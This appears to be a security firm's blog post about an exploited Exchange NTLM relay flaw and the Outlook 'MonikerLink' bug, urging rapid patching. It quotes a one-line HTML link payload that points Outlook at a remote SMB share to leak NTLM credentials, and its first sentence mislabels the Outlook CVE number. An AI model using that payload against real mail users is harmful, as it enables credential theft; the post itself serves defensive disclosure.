Project Hyphae
Search

Exchange zero day being actively exploited, Outlook RCE zero day also out there

Share This Post

Both Exchange, CVE-2024-21410 (CVSS 9.8), and Outlook, CVE-2024-21410 (CVSS 9.8), vulnerabilities were both patched in this week’s release of patches from Microsoft. CVE-2024-21410 was being exploited prior to the patch being released so you should absolutely being doing a threat hunt after applying the patch.

CVE-2024-21410 is a remote attack that allows an unauthenticated attacker do a privilege escalation utilizing an NTLM relay attack. Per Microsoft “An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf.” Mitigation is to apply this weeks patch but be aware that installing it will automatically enable Extended Protection, which could potentially break scripts that you may have so ensure you read the notes to understand what exactly is changing.

CVE-2024-21413 is an RCE for Outlook that is startling simple to exploit. The vulnerability allows attackers to bypass Protected View, which means this exploit affects preview pane and not just if an email is actually opened, with a malicious link. Researchers from CheckPoint identified that using the file:// protocol and then putting an exclamation mark after the file extension will trigger Outlook to access the URL without any user interaction required or any notifications made to the user. This is the example CheckPoint included 

*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

As of this time the Outlook vulnerability does not have any known public exploits but given how incredibly easy it is to exploit it will only be a matter of time before it is used by attackers. Based on this I probably would not wait for a normal patch cycle and would patch both CVEs mentioned in this article as quickly as possible.

Links:

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21410

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413

https://microsoft.github.io/CSS-Exchange/Security/ExchangeExtendedProtectionManagement/

https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/



Reach out to our incident response team for help

More To Explore

Information Security News – 4/14/2025

Oracle Confirms “Obsolete Servers” Hacked Article link: https://www.bleepingcomputer.com/news/security/oracle-says-obsolete-servers-hacked-denies-cloud-breach/    Phishing Kits Now Vet Victims in Real-Time Before Stealing Credentials Article link: https://www.bleepingcomputer.com/news/security/phishing-kits-now-vet-victims-in-real-time-before-stealing-credentials/    Neptune RAT

Marcus Cylar April 14, 2025

Information Security News – 4/7/2025

Criminal Group Claims Responsibility for Cyberattack on Minnesota Casino Article Link: https://cdcgaming.com/brief/cybersecurity-incident-at-minnesota-tribal-community-casino-prompts-shutdown/ As CISA Downsizes, Where Can Enterprises Get Support? Article Link: https://www.darkreading.com/cybersecurity-operations/roundtable-cisa-downsizes-where-can-enterprises-look-support Oracle Privately

Jo Moldenhauer April 7, 2025

Do You Want to Shore Up Your Defenses?

We're opening our first round of threat hunting engagements to 100 organizations. Sign up or join the wait list here.